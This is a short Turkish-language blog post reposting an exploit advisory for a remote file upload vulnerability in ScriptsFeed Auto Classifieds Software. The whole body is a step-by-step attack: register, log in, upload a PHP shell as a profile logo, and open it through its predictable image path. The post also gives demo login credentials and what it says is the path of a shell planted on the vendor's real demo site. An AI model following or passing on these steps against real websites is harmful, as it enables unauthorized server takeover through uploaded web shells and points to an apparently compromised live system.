"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

14 Kasım 2008 Cuma

ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln

ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln

link: http://www.milw0rm.com/exploits/7111

Discovered By: ZoRLu

Exploit:

http://localhost/script/cars_images/[id]_logo_your_shell.php

you register to site

register: http://localhost/script/register.php

after you login to site

login: http://localhost/script/login.php

more after you go profile edit

profile: http://localhost/script/profile.php

and you upload your_shell.php right click to your logo and select properties copy link

paste your explorer go your_shell.php

your_shell.php path:

http://localhost/script/cars_images/[id]_logo_your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1

shell path:

http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php

0 yorum:

 
Dizi